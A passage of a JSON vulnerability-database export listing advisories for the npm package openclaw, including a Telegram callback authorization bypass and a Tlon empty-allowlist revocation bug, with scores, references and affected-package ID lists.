                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-41375",
                "GHSA-h2v7-xc88-xx8c"
            ],
            "risk_score": 3.2,
            "exploitability": "0.5",
            "weighted_severity": "6.4",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tf28-1z2z-5yfn"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91270?format=api",
            "vulnerability_id": "VCID-tk9h-nqrz-uugp",
            "summary": "OpenClaw: Telegram DM-Scoped Inline Button Callbacks Bypass DM Pairing and Mutate Session State\n## Summary\n\nTelegram DM-Scoped Inline Button Callbacks Bypass DM Pairing and Mutate Session State\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nTelegram callback queries from direct messages previously used weaker callback-only authorization and could mutate session state without satisfying normal DM pairing. Commit `269282ac69ab6030d5f30d04822668f607f13065` enforces DM authorization for callbacks.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `269282ac69ab6030d5f30d04822668f607f13065`.\n\n## Fix Commit(s)\n\n- `269282ac69ab6030d5f30d04822668f607f13065`",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35661",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00055",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17545",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00055",
                            "scoring_system": "epss",
                            "scoring_elements": "0.175",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00055",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17539",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35661"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/269282ac69ab6030d5f30d04822668f607f13065",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:55Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/269282ac69ab6030d5f30d04822668f607f13065"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c9-w69r-cw33",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:55Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c9-w69r-cw33"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35661",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35661"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-telegram-dm-scoped-inline-button-callback-authorization-bypass",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:55Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-telegram-dm-scoped-inline-button-callback-authorization-bypass"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-j4c9-w69r-cw33",
                    "reference_id": "GHSA-j4c9-w69r-cw33",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-j4c9-w69r-cw33"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-35661",
                "GHSA-j4c9-w69r-cw33"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tk9h-nqrz-uugp"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90995?format=api",
            "vulnerability_id": "VCID-tqzy-84fm-z7b6",
            "summary": "OpenClaw: Tlon settings empty-allowlist reconciliation bypassed intended revocation\n## Summary\nTlon settings reconciliation treated explicit empty allowlists as unset, which could silently undo an intended deny-all revocation.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `3cbf932413e41d1836cb91aed1541a28a3122f93`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/tlon/src/monitor/index.ts now honors explicit empty allowlists as authoritative deny-all configuration.\n- extensions/tlon/src/monitor/settings-helpers.test.ts ships regression coverage for explicit empty settings allowlists.\n\nThanks @zpbrent for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35649",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10166",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10155",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10185",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35649"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:36Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-pw7h-9g6p-c378",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:36Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-pw7h-9g6p-c378"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35649",
                    "reference_id": "CVE-2026-35649",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35649"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-pw7h-9g6p-c378",
                    "reference_id": "GHSA-pw7h-9g6p-c378",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-pw7h-9g6p-c378"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-settings-reconciliation-bypass-via-empty-allowlist",
                    "reference_id": "openclaw-settings-reconciliation-bypass-via-empty-allowlist",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:36Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-settings-reconciliation-bypass-via-empty-allowlist"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
